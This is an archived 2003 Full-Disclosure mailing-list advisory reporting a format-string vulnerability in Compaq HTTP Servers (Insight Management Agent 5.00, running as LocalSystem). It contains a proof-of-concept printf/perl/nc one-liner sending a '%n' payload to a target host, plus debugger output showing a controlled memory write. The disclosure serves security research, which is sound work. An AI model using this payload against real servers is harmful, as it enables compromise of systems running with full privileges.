lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200308031503.h73F3hPZ001910@ns.wcd.se>
From: mcw at wcd.se (mcw@....se)
Subject: formatstring bug in Compaq HTTP Servers

Hi there

There is a formatstring bug in Compaq HTTP Servers.
[in <!.DebugSearchPaths>?Url=> requests]

The HTTP server runs with LocalSystem account.

Versions:
All versions i have tested had this formatstring bug.

To be shure that it wasn't allready fixed, i downloaded this new version..
Insight Management Agent  
Version: 5.00 H (01/17/2003) 
http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&SoftwareVer=17022

Request:
$ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print "A"x14'`BBBB`perl -e 'print
 ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Result:
0:005> g
(9a8.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 edi=00000800
eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
MSVCRT!setvbuf+65d:
780127a8 8908             mov     [eax],ecx         ds:0023:42424242=????????
*** WARNING: Unable to verify checksum for C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1\CpqHMMO.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\Compaq
\COMPAQ~1\CPQWEB~1\CpqHMMO.dll - 

Have a nice day
/bashis

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ